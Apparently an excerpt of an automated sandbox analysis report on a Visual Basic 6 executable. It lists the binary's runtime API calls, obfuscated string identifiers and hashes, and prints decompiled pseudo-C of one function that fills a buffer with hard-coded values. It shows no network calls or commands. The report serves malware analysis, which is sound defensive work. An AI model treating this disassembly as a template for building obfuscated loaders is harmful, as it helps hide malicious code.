      0x0041d723
      0x0041d728
      0x0041d72d
      0x0041d737
      0x0041d74a
      0x0041d74f
      0x0041d759
      0x0041d76c
      0x0041d779
      0x0041d780
      0x0041d786
      0x0041d794
      0x0041d79a
      0x0041d7a1
      0x0041d7a2
      0x0041d820
      0x0041d828
      0x0041d830
      0x0041d836
      0x0041d83c
      0x0041d83d
      0x0041d83f
      0x0041d847
      0x0041d84f
      0x0041d857
      0x0041d85f
      0x0041d867
      0x0041d872
      0x0041d877

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041C202
      • __vbaAryConstruct2.MSVBVM60(?,004029B0,00000002,?,?,?,?,00401546), ref: 0041C23C
      • __vbaVarDup.MSVBVM60 ref: 0041C261
      • #522.MSVBVM60(?,?), ref: 0041C274
      • __vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C287
      • #713.MSVBVM60(00000000,?,?,?,?), ref: 0041C28D
      • #558.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C2A9
      • __vbaFreeStr.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C2C3
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,00000008,00000008,00000000,?,?,?,?), ref: 0041C2DF
      • #541.MSVBVM60(?,7:7:7,?,?,?,00401546), ref: 0041C302
      • __vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C30E
      • __vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C318
      • __vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C323
      • __vbaVarDup.MSVBVM60 ref: 0041C348
      • #524.MSVBVM60(?,?), ref: 0041C35B
      • __vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C36E
      • #690.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C383
      • __vbaFreeStr.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C38E
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C3A3
      • #610.MSVBVM60(?,?,?,?,00401546), ref: 0041C3B2
      • #661.MSVBVM60(?,00402520,?,?,?,?,?,?,?,00401546), ref: 0041C3D5
      • __vbaVarTstGe.MSVBVM60(00008002,?), ref: 0041C3FC
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 0041C418
      • #705.MSVBVM60(00000002,00000000), ref: 0041C448
      • __vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041C452
      • __vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041C45D
      • #670.MSVBVM60(00000002,00000002,00000000), ref: 0041C469
      • __vbaStrVarMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C475
      • __vbaStrMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C47F
      • __vbaFreeVar.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C48A
      • __vbaVarDup.MSVBVM60 ref: 0041C4AF
      • #560.MSVBVM60(?), ref: 0041C4BB
      • __vbaFreeVar.MSVBVM60(?), ref: 0041C4D8
      • #648.MSVBVM60(0000000A,?), ref: 0041C518
      • __vbaFreeVar.MSVBVM60(0000000A,?), ref: 0041C52F
      • __vbaVarDup.MSVBVM60(0000000A,?), ref: 0041C590
      • #606.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C59E
      • __vbaStrMove.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C5AB
      • __vbaLenBstr.MSVBVM60(00000000,00000010,0000000A,0000000A,?), ref: 0041C5B1
      • #574.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C5CD
      • __vbaStrMove.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C5DA
      • #696.MSVBVM60(00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C5E0
      • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C602
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041C61A
      • #648.MSVBVM60(0000000A), ref: 0041C66A
      • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041C682
      • #696.MSVBVM60(OFFENTLIGHEDSSFRE,0000000A), ref: 0041C6B9
      • #696.MSVBVM60(Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C6FD
      • __vbaNew2.MSVBVM60(004025A0,004223C0,Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C722
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041C787
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041C7E3
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041C808
      • #519.MSVBVM60(tilskrersaksene,?), ref: 0041C812
      • __vbaStrMove.MSVBVM60(tilskrersaksene,?), ref: 0041C81F
      • #519.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C825
      • __vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C832
      • __vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C856
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041C896
      • #648.MSVBVM60(0000000A), ref: 0041C8B9
      • __vbaStrCopy.MSVBVM60 ref: 0041C8D9
      • __vbaFreeStr.MSVBVM60 ref: 0041C93D
      • __vbaFreeVar.MSVBVM60 ref: 0041C948
      • #527.MSVBVM60(Forretningsbrevet5), ref: 0041C95C
      • __vbaStrMove.MSVBVM60(Forretningsbrevet5), ref: 0041C969
      • __vbaFreeStr.MSVBVM60 ref: 0041C98A
      • __vbaStrCopy.MSVBVM60 ref: 0041C99A
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041C9E2
      • __vbaStrMove.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041CA12
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041CA1D
      • #535.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041CA22
      • #564.MSVBVM60(00000004,?), ref: 0041CA51
      • __vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041CA6B
      • #685.MSVBVM60(00000004,?), ref: 0041CA7F
      • __vbaObjSet.MSVBVM60(?,00000000,00000004,?), ref: 0041CA8C
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402650,0000001C), ref: 0041CAD3
      • __vbaI4Var.MSVBVM60(?), ref: 0041CB02
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,000006FC), ref: 0041CB6E
      • __vbaFreeObj.MSVBVM60(00000000,00401260,00402344,000006FC), ref: 0041CB88
      • __vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041CB9D
      • #537.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CBAA
      • __vbaStrMove.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CBB7
      • #696.MSVBVM60(00000000,0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CBBD
      • #648.MSVBVM60(0000000A), ref: 0041CBE4
      • __vbaR8FixI4.MSVBVM60(0000000A), ref: 0041CBF6
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000700), ref: 0041CC6C
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402344,00000700), ref: 0041CC86
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000700), ref: 0041CC91
      • #648.MSVBVM60(0000000A), ref: 0041CCB1
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000704), ref: 0041CD07
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000704), ref: 0041CD21
      • #648.MSVBVM60(0000000A), ref: 0041CD41
      • #714.MSVBVM60(?,00000004,00000000,0000000A), ref: 0041CD73
      • #648.MSVBVM60(0000000A,?,00000004,00000000,0000000A), ref: 0041CD93
      • #564.MSVBVM60(00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CDC3
      • __vbaHresultCheck.MSVBVM60(00000000,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CDDD
      • __vbaI4Var.MSVBVM60(?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CE10
      • __vbaI4Var.MSVBVM60(?,?,?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CE29
      • __vbaFreeVarList.MSVBVM60(00000006,0000000A,00000004,0000000A,00000004,?,?), ref: 0041CE9A
      • #581.MSVBVM60(eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CEA7
      • #713.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CEB7
      • __vbaStrMove.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CEC4
      • __vbaFpI4.MSVBVM60 ref: 0041CEE2
      • __vbaStrCopy.MSVBVM60 ref: 0041CEF8
      • __vbaStrMove.MSVBVM60(Benefact6,?), ref: 0041CF15
      • __vbaStrMove.MSVBVM60 ref: 0041CF56
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CF72
      • #696.MSVBVM60(ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CF7F
      • #574.MSVBVM60(00000003), ref: 0041CFA6
      • __vbaStrMove.MSVBVM60(00000003), ref: 0041CFB3
      • __vbaR8IntI4.MSVBVM60(00000003), ref: 0041CFBE
      • __vbaLenBstrB.MSVBVM60(Whiskysourens1,?,?,?), ref: 0041CFFB
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000708), ref: 0041D038
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402344,00000708), ref: 0041D052
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000708), ref: 0041D05D
      • #696.MSVBVM60(Kainsmrkernes3), ref: 0041D067
      • __vbaStrCopy.MSVBVM60 ref: 0041D0E6
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,0000070C), ref: 0041D144
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402344,0000070C), ref: 0041D15E
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000710), ref: 0041D1BF
      • __vbaVarDup.MSVBVM60(00000000,00401260,00402344,00000710), ref: 0041D1F3
      • #607.MSVBVM60(?,00000065,00000003), ref: 0041D208
      • __vbaStrVarMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D214
      • __vbaStrMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D221
      • __vbaStrCopy.MSVBVM60(?,?,00000065,00000003), ref: 0041D231
      • __vbaLenBstrB.MSVBVM60(Udstillingslokalet,?,?,000FFFC6,005EA767,?,?,00000065,00000003), ref: 0041D267
      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D2A7
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000), ref: 0041D2BF
      • #705.MSVBVM60(00000002,00000000), ref: 0041D2E4
      • __vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041D2F1
      • __vbaLenBstrB.MSVBVM60(00000000,00000002,00000000), ref: 0041D2F7
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000714), ref: 0041D332
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402344,00000714), ref: 0041D34C
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000714), ref: 0041D357
      • __vbaLenBstr.MSVBVM60(Generalisations7), ref: 0041D361
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000718), ref: 0041D3B4
      • #525.MSVBVM60(00000067), ref: 0041D3D3
      • __vbaStrMove.MSVBVM60(00000067), ref: 0041D3E0
      • #618.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D3EC
      • __vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D3F9
      • __vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D41D
      • __vbaStrCopy.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D440
      • __vbaStrMove.MSVBVM60(?,SOLITRSKAKKEN,Indvi2,Fdres,?,STRUTTENDE,00000017,00000067), ref: 0041D46E
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,0000071C), ref: 0041D4AB
      • __vbaStrMove.MSVBVM60(00000000,00401260,00402344,0000071C), ref: 0041D4DB
      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0041D505
      • #564.MSVBVM60(00000005,?), ref: 0041D53D
      • __vbaHresultCheck.MSVBVM60(00000000), ref: 0041D557
      • #541.MSVBVM60(?,16:16:16), ref: 0041D577
      • __vbaStrVarVal.MSVBVM60(?,?,?,16:16:16), ref: 0041D58A
      • #519.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D590
      • __vbaStrMove.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D59D
      • #648.MSVBVM60(0000000A,00000000,?,?,?,16:16:16), ref: 0041D5BD
      • __vbaStrMove.MSVBVM60(?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D609
      • __vbaI4Var.MSVBVM60(?,00000000,?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D616
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000720), ref: 0041D64C
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D682
      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041D6A8
      • #696.MSVBVM60(00402904), ref: 0041D6B5
      • #696.MSVBVM60(0040294C,00402904), ref: 0041D6C6
      • __vbaStrCopy.MSVBVM60(0040294C,00402904), ref: 0041D6DD
      • __vbaFreeStr.MSVBVM60 ref: 0041D723
      • __vbaVarMove.MSVBVM60 ref: 0041D74A
      • __vbaVarMove.MSVBVM60 ref: 0041D76C
      • __vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041D780
      • __vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041D786
      • __vbaFreeVar.MSVBVM60(0041D878), ref: 0041D820
      • __vbaFreeStr.MSVBVM60(0041D878), ref: 0041D828
      • __vbaAryDestruct.MSVBVM60(00000000,?,0041D878), ref: 0041D83F
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D847
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D84F
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D857
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D85F
      • __vbaFreeVar.MSVBVM60(00000000,?,0041D878), ref: 0041D867
      • __vbaFreeStr.MSVBVM60(00000000,?,0041D878), ref: 0041D872
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$CheckHresult$List$#648#696$Copy$Bstr$#519#564$#541#574#705#713$#522#524#525#527#535#537#558#560#581#606#607#610#618#661#670#685#690#714ChkstkConstruct2DestructIdivNew2
      • String ID: 16:16:16$7:7:7$=9$ADMIRINGLY$ASCRY$Admiraliteternes1$Benefact6$Bursati$CANNIBALEAN$DUMBFISH$Dagvagten$Fdres$Forretningsbrevet5$Generalisations7$Hjortens$Indvi2$Kainsmrkernes3$Lersernes$OFFENTLIGHEDSSFRE$Odontoma7$Paucify9$RODTEGNENES$Readjust$SELVFINANSIEREDES$SOLITRSKAKKEN$STRUTTENDE$Skovteknikeren6$Snoreskrternes8$Udstillingslokalet$Utrecht8$Vidnefast$Whiskysourens1$blaarv$centralregeringens$eudaemonistical$multivalent$replicr$tilskrersaksene$tril$undrede
      • API String ID: 1918163132-2023598156
      • Opcode ID: d8af4b4ed56b1ce04ec80369087825d785397d132b71784da8bc56000821cb97
      • Instruction ID: d19f65dcb5dca34613dcd9d285a75da2da83534f200251e5906f204df5f4b324
      • Opcode Fuzzy Hash: d8af4b4ed56b1ce04ec80369087825d785397d132b71784da8bc56000821cb97
      • Instruction Fuzzy Hash: 42D2F875940228ABDB21EF61CD85FDDB7B8AF04304F1080EAE509BB2A1DB785B85CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041FAD0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416COMMON
      Download Yara Rule
      C-Code - Quality: 59%
      			E0041FAD0(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				short* _v52;
				char _v64;
				short _v72;
				void* _v76;
				char _v80;
				void* _v84;
				intOrPtr _v92;
				char _v100;
				char _v116;
				intOrPtr _v124;
				char _v132;
				short _v140;
				char _v148;
				char _v164;
				intOrPtr _v172;
				char _v180;
				char* _v204;
				intOrPtr _v212;
				void* _v232;
				char _v236;
				short _v240;
				signed int _v244;
				intOrPtr* _v248;
				signed int _v252;
				intOrPtr* _v264;
				signed int _v268;
				signed int _v272;
				signed int _t182;
				short _t184;
				char* _t191;
				short _t193;
				char* _t201;
				short _t204;
				short _t208;
				char* _t210;
				short _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				short _t222;
				signed int _t223;
				signed int _t225;
				signed int _t227;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				short _t237;
				signed int _t238;
				signed int _t240;
				short _t242;
				signed int _t243;
				char* _t245;
				char* _t250;
				signed int _t259;
				signed int _t264;
				signed int _t278;
				signed int _t287;
				signed int _t296;
				signed int _t300;
				signed int _t305;
				void* _t334;
				void* _t336;
				intOrPtr _t337;
				void* _t338;

				_t337 = _t336 - 0xc;
				 *[fs:0x0] = _t337;
				L00401540();
				_v16 = _t337;
				_v12 = 0x4013d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t334);
				L004017B6();
				_push(2);
				_push(0x402ff8);
				_t182 =  &_v64;
				_push(_t182);
				L0040186A();
				if((_t182 | 0xffffffff) != 0) {
					_v92 = 0x80020004;
					_v100 = 0xa;
					_push( &_v100);
					L00401648();
					_v36 = __fp0;
					L00401828();
					_push(0xd4);
					L00401786();
					L0040183A();
				}
				_v124 = 0x80020004;
				_v132 = 0xa;
				_t184 =  &_v132;
				_push(_t184);
				L004017F2();
				_v140 = _t184;
				_v148 = 2;
				_push( &_v148);
				_push( &_v164);
				L004016C0();
				_push(L"Rappees");
				_push(L"Jiggerens");
				_push( &_v100); // executed
				L00401732(); // executed
				_push( &_v100);
				_push( &_v116);
				L00401852();
				_push(0x52);
				_push( &_v164);
				_t191 =  &_v80;
				_push(_t191);
				L00401858();
				_push(_t191);
				L0040162A();
				_v172 = _t191;
				_v180 = 0x8008;
				_push( &_v116);
				_t193 =  &_v180;
				_push(_t193);
				L00401738();
				_v240 = _t193;
				L00401846();
				_push( &_v180);
				_push( &_v116);
				_push( &_v164);
				_push( &_v148);
				_push( &_v132);
				_push( &_v100);
				_push(6);
				L00401840();
				_t338 = _t337 + 0x1c;
				if(_v240 != 0) {
					_v204 = L"PREHISTORICS";
					_v212 = 8;
					L0040184C();
					_push(0xa2);
					_push( &_v100);
					_push( &_v116);
					L00401624();
					_v124 = 0x8d;
					_v132 = 2;
					_push( &_v132);
					_push(0x75);
					_push( &_v116);
					_t250 =  &_v80;
					_push(_t250);
					L00401858();
					_push(_t250);
					L004016A2();
					L0040183A();
					L00401846();
					_push( &_v132);
					_push( &_v116);
					_push( &_v100);
					_push(3);
					L00401840();
					_t338 = _t338 + 0x10;
					if( *0x4223c0 != 0) {
						_v264 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v264 = 0x4223c0;
					}
					_v240 =  *_v264;
					_t259 =  *((intOrPtr*)( *_v240 + 0x14))(_v240,  &_v84);
					asm("fclex");
					_v244 = _t259;
					if(_v244 >= 0) {
						_v268 = _v268 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402590);
						_push(_v240);
						_push(_v244);
						L004017C8();
						_v268 = _t259;
					}
					_v248 = _v84;
					_t264 =  *((intOrPtr*)( *_v248 + 0xc0))(_v248,  &_v232);
					asm("fclex");
					_v252 = _t264;
					if(_v252 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0xc0);
						_push(0x4025b0);
						_push(_v248);
						_push(_v252);
						L004017C8();
						_v272 = _t264;
					}
					_v72 = _v232;
					L004017C2();
				}
				_v92 = 0x3a;
				_v100 = 2;
				_t201 =  &_v100;
				_push(_t201);
				_push(8);
				_push(L"UNINTERMITTEDLY");
				L004016A2();
				_v124 = _t201;
				_v132 = 0x8008;
				_push( &_v116);
				L004017FE();
				_push( &_v132);
				_t204 =  &_v116;
				_push(_t204);
				L00401738();
				_v240 = _t204;
				_push( &_v116);
				_push( &_v132);
				_push( &_v100);
				_push(3);
				L00401840();
				_t208 = _v240;
				if(_t208 != 0) {
					_push(0xb1);
					L00401756();
					L0040183A();
					_push(_t208);
					L004017EC();
					 *_v52 = _t208;
					L00401846();
					_push(L"MINESTRYGNING");
					L004017EC();
					 *((short*)(_v52 + 2)) = _t208;
					_push(L"2:2:2");
					_push( &_v100);
					L0040182E();
					_push( &_v100);
					_t213 =  &_v80;
					_push(_t213);
					L00401858();
					_push(_t213);
					L004017EC();
					_t278 = 2;
					 *((short*)(_v52 + (_t278 << 1))) = _t213;
					L00401846();
					L00401828();
					_t214 = 2;
					 *((short*)(_v52 + _t214 * 3)) = 0x4cf8;
					_t216 = 2;
					 *((short*)(_v52 + (_t216 << 2))) = 0xe04;
					_t218 = 2;
					 *((short*)(_v52 + _t218 * 5)) = 0x1773;
					_t220 = 2;
					 *((short*)(_v52 + _t220 * 6)) = 0x56a4;
					_v92 = 0x42458a;
					_v100 = 3;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_t222 =  &_v100;
					_push(_t222);
					L0040161E();
					L0040183A();
					_push(_t222);
					L004017EC();
					_t287 = 2;
					 *((short*)(_v52 + _t287 * 7)) = _t222;
					L00401846();
					L00401828();
					_t223 = 2;
					 *((short*)(_v52 + (_t223 << 3))) = 0x196e;
					_t225 = 2;
					 *((short*)(_v52 + _t225 * 9)) = 0x15b6;
					_t227 = 2;
					 *((short*)(_v52 + _t227 * 0xa)) = 0x1a5;
					_t229 = 2;
					 *((short*)(_v52 + _t229 * 0xb)) = 0x3c4c;
					_t231 = 2;
					_t232 = _t231 * 0xc;
					 *((short*)(_v52 + _t232)) = 0x3974;
					_push(L"Suppositoriets");
					L004017EC();
					_t296 = 2;
					 *(_v52 + _t296 * 0xd) = _t232;
					_t233 = 2;
					 *((short*)(_v52 + _t233 * 0xe)) = 0x5ff7;
					_t235 = 2;
					 *((short*)(_v52 + _t235 * 0xf)) = 0x758c;
					_v92 = 0x80020004;
					_v100 = 0xa;
					_t237 =  &_v100;
					_push(_t237);
					L004017F2();
					_t300 = 2;
					 *((short*)(_v52 + (_t300 << 4))) = _t237;
					L00401828();
					_t238 = 2;
					 *((short*)(_v52 + _t238 * 0x11)) = 0xef8;
					_t240 = 2;
					 *((short*)(_v52 + _t240 * 0x12)) = 0x12b7;
					_v92 = 0x80020004;
					_v100 = 0xa;
					_t242 =  &_v100;
					_push(_t242);
					L004017F2();
					_t305 = 2;
					 *((short*)(_v52 + _t305 * 0x13)) = _t242;
					L00401828();
					_t243 = 2;
					 *((short*)(_v52 + _t243 * 0x14)) = 0x3e84;
					_v92 = 0x57f4;
					_v100 = 2;
					_push(L"BESMUDSES");
					_t245 =  &_v100;
					_push(_t245);
					L00401618();
					L0040183A();
					_push(_t245);
					L00401696();
					L0040183A();
					L00401846();
					L00401828();
				}
				asm("wait");
				_push(0x4200fa);
				L00401846();
				L00401846();
				L00401846();
				_v236 =  &_v64;
				_t210 =  &_v236;
				_push(_t210);
				_push(0);
				L0040173E();
				L00401846();
				return _t210;
			}













































































      0x0041fad3
      0x0041fae2
      0x0041faee
      0x0041faf6
      0x0041faf9
      0x0041fb00
      0x0041fb0f
      0x0041fb18
      0x0041fb1d
      0x0041fb1f
      0x0041fb24
      0x0041fb27
      0x0041fb28
      0x0041fb32
      0x0041fb34
      0x0041fb3b
      0x0041fb45
      0x0041fb46
      0x0041fb4b
      0x0041fb51
      0x0041fb56
      0x0041fb5b
      0x0041fb65
      0x0041fb65
      0x0041fb6a
      0x0041fb71
      0x0041fb78
      0x0041fb7b
      0x0041fb7c
      0x0041fb81
      0x0041fb88
      0x0041fb98
      0x0041fb9f
      0x0041fba0
      0x0041fba5
      0x0041fbaa
      0x0041fbb2
      0x0041fbb3
      0x0041fbbb
      0x0041fbbf
      0x0041fbc0
      0x0041fbc5
      0x0041fbcd
      0x0041fbce
      0x0041fbd1
      0x0041fbd2
      0x0041fbd7
      0x0041fbd8
      0x0041fbdd
      0x0041fbe3
      0x0041fbf0
      0x0041fbf1
      0x0041fbf7
      0x0041fbf8
      0x0041fbfd
      0x0041fc07
      0x0041fc12
      0x0041fc16
      0x0041fc1d
      0x0041fc24
      0x0041fc28
      0x0041fc2c
      0x0041fc2d
      0x0041fc2f
      0x0041fc34
      0x0041fc40
      0x0041fc46
      0x0041fc50
      0x0041fc63
      0x0041fc68
      0x0041fc70
      0x0041fc74
      0x0041fc75
      0x0041fc7a
      0x0041fc81
      0x0041fc8b
      0x0041fc8c
      0x0041fc91
      0x0041fc92
      0x0041fc95
      0x0041fc96
      0x0041fc9b
      0x0041fc9c
      0x0041fca6
      0x0041fcae
      0x0041fcb6
      0x0041fcba
      0x0041fcbe
      0x0041fcbf
      0x0041fcc1
      0x0041fcc6
      0x0041fcd0
      0x0041fced
      0x0041fcd2
      0x0041fcd2
      0x0041fcd7
      0x0041fcdc
      0x0041fce1
      0x0041fce1
      0x0041fcff
      0x0041fd17
      0x0041fd1a
      0x0041fd1c
      0x0041fd29
      0x0041fd4b
      0x0041fd2b
      0x0041fd2b
      0x0041fd2d
      0x0041fd32
      0x0041fd38
      0x0041fd3e
      0x0041fd43
      0x0041fd43
      0x0041fd55
      0x0041fd70
      0x0041fd76
      0x0041fd78
      0x0041fd85
      0x0041fdaa
      0x0041fd87
      0x0041fd87
      0x0041fd8c
      0x0041fd91
      0x0041fd97
      0x0041fd9d
      0x0041fda2
      0x0041fda2
      0x0041fdb8
      0x0041fdbf
      0x0041fdbf
      0x0041fdc4
      0x0041fdcb
      0x0041fdd2
      0x0041fdd5
      0x0041fdd6
      0x0041fdd8
      0x0041fddd
      0x0041fde2
      0x0041fde5
      0x0041fdef
      0x0041fdf0
      0x0041fdf8
      0x0041fdf9
      0x0041fdfc
      0x0041fdfd
      0x0041fe02
      0x0041fe0c
      0x0041fe10
      0x0041fe14
      0x0041fe15
      0x0041fe17
      0x0041fe1f
      0x0041fe28
      0x0041fe2e
      0x0041fe33
      0x0041fe3d
      0x0041fe42
      0x0041fe43
      0x0041fe4b
      0x0041fe51
      0x0041fe56
      0x0041fe5b
      0x0041fe63
      0x0041fe67
      0x0041fe6f
      0x0041fe70
      0x0041fe78
      0x0041fe79
      0x0041fe7c
      0x0041fe7d
      0x0041fe82
      0x0041fe83
      0x0041fe8a
      0x0041fe90
      0x0041fe97
      0x0041fe9f
      0x0041fea6
      0x0041fead
      0x0041feb5
      0x0041febc
      0x0041fec4
      0x0041fecb
      0x0041fed3
      0x0041feda
      0x0041fee0
      0x0041fee7
      0x0041feee
      0x0041fef0
      0x0041fef2
      0x0041fef4
      0x0041fef6
      0x0041fef9
      0x0041fefa
      0x0041ff04
      0x0041ff09
      0x0041ff0a
      0x0041ff11
      0x0041ff18
      0x0041ff1f
      0x0041ff27
      0x0041ff2e
      0x0041ff35
      0x0041ff3d
      0x0041ff44
      0x0041ff4c
      0x0041ff53
      0x0041ff5b
      0x0041ff62
      0x0041ff6a
      0x0041ff6b
      0x0041ff71
      0x0041ff77
      0x0041ff7c
      0x0041ff83
      0x0041ff8a
      0x0041ff90
      0x0041ff97
      0x0041ff9f
      0x0041ffa6
      0x0041ffac
      0x0041ffb3
      0x0041ffba
      0x0041ffbd
      0x0041ffbe
      0x0041ffc5
      0x0041ffcc
      0x0041ffd3
      0x0041ffda
      0x0041ffe1
      0x0041ffe9
      0x0041fff0
      0x0041fff6
      0x0041fffd
      0x00420004
      0x00420007
      0x00420008
      0x0042000f
      0x00420016
      0x0042001d
      0x00420024
      0x0042002b
      0x00420031
      0x00420038
      0x0042003f
      0x00420044
      0x00420047
      0x00420048
      0x00420052
      0x00420057
      0x00420058
      0x00420062
      0x0042006a
      0x00420072
      0x00420072
      0x00420077
      0x00420078
      0x004200c5
      0x004200cd
      0x004200d5
      0x004200dd
      0x004200e3
      0x004200e9
      0x004200ea
      0x004200ec
      0x004200f4
